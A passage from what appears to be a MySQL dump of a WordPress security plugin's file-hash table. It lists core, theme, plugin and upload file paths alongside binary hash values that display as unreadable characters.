','wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�f�q�-kә!���','?,J��\Z</�ٯ�Wf���,:���o��eAe\"','',0,'?'),('��o4}+��8��O�','wp-content/plugins/wp-cerber/assets/flags/nc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!5�A/g��4�S�H','�.)Po�\\r�d� !NZ�Ӆ�8��8E��','',0,'?'),('��L �U���f��u�<','wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),('���Y����x���Q','wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r`Rb_�n+f����','�P]�F�\Z;O�Ȣ��c�J���t�B��c�g','',0,'?'),('���o�w���Ў�696I','wp-includes/random_compat/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('��)�KK�;���t~�','wp-content/plugins/wp-cerber/languages/wp-cerber-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bwn�߃�|�7�w��','�j�w��h�Gv�MxT�~Vew<\"��`��J�<�','',0,'?'),('��k��{m�%� �D�','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4|S�5w76�ae�.��','����!@�08:?\'�d���>\r������ Bn','',0,'?'),('�Z��Q+x�r��0��','wp-includes/blocks/media-text/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v�T-�M�%g7�','��\",?sM�|5H1���/��&+�;cޢ���F','',0,'?'),('��[B�^�� Z�1�','wp-content/themes/twentynineteen/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\nqYĸ`p����','�?Zt-�(D��~���$mͼ�wj�x$\n�^E�','',0,'?'),('���Iy-�\n�ń��','wp-includes/Requests/Exception/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��F�9��Q� ','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('�\" 6A��7^�H�','wp-includes/blocks/cover/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�U#& �\0�0Aj','F���q×��O�`?��|�y�!5a/;�3T','',0,'?'),('�:=�%����M�۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-^{�2�`�D<oY','��ji#7���Rc.�8��狿�ne�Ƨ9','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)� >','',0,'?'),('�R)�����!����','wp-content/themes/vega/assets/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��rFR�� S&2�','����}��˹t$��)�ʦ��P��1��~܀��','',0,'?'),('�U�7v��������\n','wp-content/plugins/wp-cerber/assets/multi/multi.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ݕD��E��','�W>)pM��!��=�V#qu&,N�����+��','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M?�Q��\'I\nx3��`','q�g��\0�jZ�ȌӞ����5�#fe׃���=��','',0,'?'),('�id�^,�4�@= ��9�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���>/�D�H�\r�7C�','l�L�3RN���i��Ú����V>�� �O���','',0,'?'),('�k�=lFJKYF\r�\"','wp-content/uploads/2019/08/Massages-300x200.jpg',0,'k�\\E6��`u-S;��o','k�\\E6��`u-S;��o','|���,kY 0�o#S+�o>�b�R�G�9;�2','',0,'?'),('����^M�|9\"�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-hu_HU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nZP�\0m<�����T','�\0d����}��;L�H�N)��\nwj����gf','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('���3.�\Z�=�k_8�','wp-content/plugins/wordpress-seo/src/exceptions/oauth/authentication-failed-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Jp�l��b�7�','����g1���T�4BP�#�l�l�.���cLE','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-ڐ,q\nj�[��dކe','e��5�=qx�5U���#lS��K�;��[���M','',0,'?'),('��3�����\'cy��X%','wp-content/uploads/2018/05/builder-350x220.jpg',0,'@Duf_����I��t','@Duf_����I��t','M��|�\n1TT����Xv�pU�+t/UÉ�rH','',0,'?'),('��#�dl|M�SRə','wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ն�ڌ����CE\'�','LL�c�h��n�ԵoL#M㱚H:\0\'�1�,p','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�կ���#�z_\'��+','vT��oC�G��Ng���3�?�Xm��K','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa y�fh��0v\'u�vm�','',0,'?'),('���jN����O�Z�Y','wp-content/languages/en_GB-81d6f084cb273e02e15b01bd9ece87f7.json',0,'%�� BTf$BqlDuY�','%�� BTf$BqlDuY�','`T|�-6G���$N3<@��\']\\a�a~���Ż+','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\\f����t�','�����#�5���˟�ڰY\Z����\\���:a��','',0,'?'),('��w��i.�w�(M;0D','wp-content/plugins/akismet/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��|���2-�#�','�J�S�\\<�Cޏ�=s\'WI&\Z�(���vaTo','',0,'?'),('��!?M�\"Q��e>��','wp-content/plugins/wp-cerber/assets/nexus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"����tw�L�','clY`��-�]N�U��~���uA1W�R�j�XR�','',0,'?'),('�Km)�&c�7�9!�a','wp-content/plugins/wordpress-seo/lib/migrations/column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�`_^>뻪Ӽ?��','���?�>b�J@�q��Gz��~ӄ��u��a�','',0,'?'),('���ws� ��+���C\'','wp-content/themes/twentytwenty/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']B���M\"+��J,�','���t!�W��*)���%��=o#��O�o���x�','',0,'?'),('�O��>�D�P��[�','wp-content/uploads/2016/11/retro-3249927_960_720.jpg',0,'T�5cgX�nc����','T�5cgX�nc����','.<thf�4���V�K��#��ZF$���~g�uz1�','',0,'?'),('�[��q|�O)0<���','wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1��ä2\"�l��','��\"4�(��%�H9s�P��FkA2|9��z','',0,'?'),('� ��g����%�!�','wp-includes/blocks/site-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�h�|�W���4d$�','<��V��i��L���3l��TZ��nW�9O��','',0,'?'),('� �&?�F�ZiE�Od','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��c�K=�G^e�','�*/G�i�ю�ķ\'�&�c�\0,ޚ�� s�6)','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BX�N��sv �n��~�','c��Y��c�V����9�7e��B;�QYa,�2','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��t{0o�ޖ','7<NoQF���\0�$�j�aϤ m���\r�i��','',0,'?'),('�74���5��Zw^�b','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/post-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�Na��;Y�t�<�t','�p�h�0��5h�]}�5p�� ���@�ۮ��','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('�X*����VL �_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�\"HL19ңl��Qޮ','��m\\�b��P��|�A�8��o������� z2�','',0,'?'),('�_� ��6T���NG?','wp-includes/blocks/search/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��Ƽ\Z�28�{�k�','�̍M�I:(%�\'U�)Y�Ȋ��\'�>�6','',0,'?'),('�j��I���<��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('����K�X�=}�o�\"�','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-350x220.jpg',0,'`[�������Vm0','`[�������Vm0','��J̵���Kh�Ht�h���o��y�g�&���b','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),('��2u�\"<g�@�f�%','wp-content/plugins/wp-cerber/assets/flags/ki.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K���ȶ�','�\"�&9ʈ��7�lZ��P�퇢 �j�/','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('���s��c��ˠ|�9','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�ZH��zz��,��','� \rA�v��7�ͽ�f�f?Ҋ�5Y�[�+߯�','',0,'?'),('�����nJ-2���5W�','wp-includes/blocks/rss/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��>\r�h���i','em�����ػI�\rl$uAx���ɭ���g�[','',0,'?'),('��e�\\��1�tƋ�< �','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��-�2�<�Ei','wp-content/plugins/wordpress-seo/languages/yoast-components-en_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_��#(�l,\0�','�5\",�wq�\'�&8ox�J�2�Z(�G��1{n0Ei','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r�H�!c��M����','�}@ҳ��5�8�zh�A*ѹ�U3Kศi��','',0,'?'),('���a��\ZIf�8R�U','wp-content/plugins/wordpress-seo/src/generators/schema/third-party/events-calendar-schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?b���.� L��6','vҠ?�>��c��]�NA$�0�5��B��\r�C!h','',0,'?'),('��V�Z�8�=�v���c','wp-includes/blocks/freeform/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��\n����F�͛�','�680�2f~�0��\\!��h�nBQf\'�','',0,'?'),('��ڸP���ֺb�','wp-includes/blocks/social-link/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~\'+��L����i�',']����[\'vX���\0����N�hZ�U?����','',0,'?'),('��ᨢR��]�K��|z�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/InvalidArgumentException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�||EW|U\rIfa쎗L','s�)��LM\Z(�����F��u؟8Y+x','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��Σڕ�F�ƫ','�p�\rra���.�M̎׆ͻ��X�?�O�NcX�(','',0,'?'),('�!q[-n\rN��m7���','wp-content/plugins/redirection/api/api-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ON[f}� 㥣��\\�','R �����7\"\n� ��Z:��K��s��1��\Z@','',0,'?'),('�=Q?I�42�F�L��','wp-content/uploads/2016/11/retro-3249927_960_720-768x511.jpg',0,'��Q����!O�87�O','��Q����!O�87�O','+fmvƌLTa��G�G����B��� q�g(','',0,'?'),('�HR3}��Zc�d�i','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��&b���t�a�','J�cɋ��,R(��ճ��\r*��?��˸','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�Vf> |W�ٗIAiE','wp-content/themes/vega/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0b�a���V��\'hB','J�)r��/�K�����gI�����Ԃ���','',0,'?'),('�d��RĆC�P���b&','wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\rW�����Н','%��?�\Z�v�bq]��g�5Z)u�Ѷ\Z�o�\'�0','',0,'?'),('�kIK����V[�� 5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s �15�','',0,'?'),('�s.�V!���Xtãs�.','wp-content/plugins/wordpress-seo/src/helpers/capability-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���̖0i��V�҇�','&%˴��t�E;V���s���%�+2��I�jZ','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�xm�5��o�-]�Ž��','wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��x�_r�Z�','�6�� Ք���ۻ����!�|d�p�','',0,'?'),('����v�r@�{�c{','wp-includes/blocks/social-link/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>���7��n�� .��','X��Ö��GT�<\0<x\0ob.����$�u2h�','',0,'?'),('���������*_�\"','wp-content/plugins/wp-cerber/assets/flags/tc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sp�I��7��03CP','[���V�c\"��Z}t�a�n��%PB\ZgF�Yw','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƗVQ�%�$5�3���','�T�-m�#��^�Η�$f��G4&���Ys','',0,'?'),('��¼c���5����','wp-content/plugins/wordpress-seo/src/surfaces/meta-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˖ŋ!g��=N)|Tr�','�th�o����Hc#\'�F��,cQp�#p��4','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('��Qs|�c�LVH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?L�,k��|n�','�r�J�_9���~��uz�{�z������P','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!&���|�\\]','�L��<��P�����ġ�̹I~�I\"�v','',0,'?'),('���;q�of��V[�','wp-content/uploads/2016/11/interior-design-397x311.jpg',0,'{�}G�2J�����:\r','{�}G�2J�����:\r','K�I������i�b��.[�F*�A���mS�','',0,'?'),('�I~���~�@�','wp-content/plugins/wordpress-seo/languages/yoast-components-ko_KR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��%���B�3[Q','\\P��(x!tȼ+*�,��&��F�','',0,'?'),('�\Z���M`�yᕙd�','wp-content/plugins/wp-cerber/assets/flags/cm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�.��`�t�sI01','���F�]��g�ZBN��to Q��m�,�j','',0,'?'),('� �x�k���&Dx','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/site-analysis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|SA��s��(���ω','��%g�X��2p��3އ���i��0_��ts','',0,'?'),('�?��&�,w��e�<\Z','wp-content/plugins/wordpress-seo/src/conditionals/feature-flag-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���eG.�m(P�Z','�W�<˝����dq�ܬ��\'�.�H�GMS��','',0,'?'),('�F# ��{O6yl�]S�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-hu_HU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ol��=R�~���}���','c�\Z#za���\Z<�Ӊ:�`��W\'J;�R�L','',0,'?'),('�N$�/�g:���=�p:','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-nb_NO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�KB�C���)��','����fOB٪�r��2�H�I\n���;v�S\Z��@','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���W*�:�F}}�+','.�A��e�V�_�\Z�@h�pCI�KS&J�@�Z�Y<','',0,'?'),('�U��z��c��p��','wp-includes/blocks/separator/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�D��JoA���','\"w� ��u���{[�H�6W�ο��','',0,'?'),('�n97�I.O�ҝ�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f(�5�\r;^�\'�','��\0�cޜL+�8�Bw�\"�U�w./0�\nF@J','',0,'?'),('�x��s$f^3�j�','wp-content/uploads/2019/08/health2.jpg',0,'ho�q��F�@Q�','ho�q��F�@Q�','�V�K-D�1<��E|��ԍ*�\rC�d��T��','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4 춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('��[�6��dcHa ','wp-includes/blocks/latest-posts/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�6�)��_���X��','�s@5�֜J�Q��\"Ӹ��qヹU\'��a�gE','',0,'?'),('��f餧xM�P]~B��','wp-content/plugins/akismet/class.akismet-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��� ���qE9g:I','v26�}۞���\Z�\no��g$�$�@[�C�\\V','',0,'?'),('���\r)�[��ɍ)�m','wp-content/plugins/wordpress-seo/css/dist/workouts-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g���A9=�D��$','�*px�f�TYʸ=O�W!%~\Zzh���XE','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('�͓*I�6�D��Y��','wp-content/plugins/wordpress-seo/images/support-team.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��Zi7A�^?^>�@�','��C�1��^�U8�Mc��ܶ7F��9k�x','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�a�Rd��\\�T','3�����$ׁʌe����}K�+\"~y�``�','',0,'?'),('���䉢���.�i)','wp-content/themes/vega/sample/images/featured-image-4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���$�p�^�e��','M�����#��&6��hZ1q(�W�˞���yYt��','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͢Ɵ6��ǰD�ۦ�','6i�b�؋��u-��L���^� �v�4|f�%�Xg','',0,'?'),('��U�]R���)Y��m','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�j����0�����9','��\Z�Ҩ2�#��s:�Р\n v��Ø+l�','',0,'?'),('���V��Amބ�Ǔ%͈','wp-content/languages/en_GB-a9dc201dcd011fe71849743133052619.json',0,'G\r�`1�� �A��','G\r�`1�� �A��','����StF��=F�����]$r!�ǤG�2�','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('�䂂I(��t��a�','wp-content/uploads/2021/08/building-768815_1920-350x220.jpg',0,'�dz�K��Z�^+��|X','�dz�K��Z�^+��|X','p�W^�?������XY��8��,7��\'s','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�&��L��]�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('�$����!���+&q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$sR��iNS&&$�d','��l��W�+��� ��5�� ���\rզI9Yk','',0,'?'),('�+\'�;W��#���|\n�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_CR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v7��y��5a��m','�ɿ�\r�(6g,_-1T�#R\0Z��84�09�','',0,'?'),('�1��ϣ�����I�','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������+>��','�dlы۹`�������J���#|i{�','',0,'?'),('�<��|~E.�Y^�!�]','wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t��K!��1��vDb','9���:��%�B�Ɖ\\c֏��WpX� �Q���','',0,'?'),('�?�\n5��H�?����','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IM4�6s=�cR�]�l','n.�\n�dE\Z�Tg��0C+\ZԶ��S<��Ar\n','',0,'?'),('�DV�ɪl�-�XC��`\\','wp-content/plugins/wp-cerber/assets/flags/cu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝhm!�7���3.�','P�bLO���*]���3�o }���z�xN��','',0,'?'),('�M�A���!m��\"�c','wp-content/uploads/2019/08/young-350x220.jpg',0,'�����gpVS�q�pi','�����gpVS�q�pi','��`��z#ze��R;���И��4����[�','',0,'?'),('�UD�Ğ�;��(Ǩl','wp-content/plugins/wordpress-seo/inc/class-wpseo-content-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c1�XcԳL�B7 &�','?)qR\"$%�\n-5�9t\"Ĭi+<z.�* �','',0,'?'),('�WI�����a�j��','wp-content/uploads/2019/09/cleaning-3977589_960_720-300x200.jpg',0,'GD\"k�\r����7C�6','GD\"k�\r����7C�6','�{D� �?��[3��I��c2~ph1\r�,Q��','',0,'?'),('�\\Nׯ��鳐����v','wp-content/plugins/wordpress-seo/languages/yoast-components-bs_BA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H,��4��7�jq��)','�n2鞐l���2�}U�v9�.uiϘP','',0,'?'),('�����juGCtO���','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fB��i�Ԙ�-T�','J�Q���ޏ1m��d���f��d3�_rg@\r','',0,'?'),('��l�.H|S���{��','wp-includes/js/jquery/ui/effect-transfer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('��a��s��O���ʻ','wp-content/plugins/wordpress-seo/src/integrations/feature-flag-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xR��\\��-','�#�?t\"�_��� 